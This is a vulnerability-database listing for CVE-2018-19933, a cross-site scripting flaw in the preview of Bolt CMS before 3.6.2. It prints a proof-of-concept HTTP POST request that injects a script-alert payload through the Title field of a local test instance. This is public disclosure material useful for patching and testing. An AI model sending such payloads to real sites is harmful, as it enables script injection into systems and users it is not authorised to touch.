Lucene search
K

Bolt CMS 3.6.2 - Cross-Site Scripting

🗓️ 19 Dec 2018 00:00:00Reported by Raif Berkay DincelType 
exploitpack
 exploitpack
👁 31 Views

Bolt CMS <3.6.2 - Cross-Site Scripting allows XSS via text input, click the preview button. Affects Title field of Configured and New Entry

Related
Code
# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm 
# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ < 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10

# Vulnerable Parameter Type: POST 
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: <script>alert("Raif")</script> 

# Description

Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.

# PoC [Video]: https://youtu.be/3eTPyIpjCJg
 
# Proof of Concepts:
 
POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Dec 2018 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.03466
31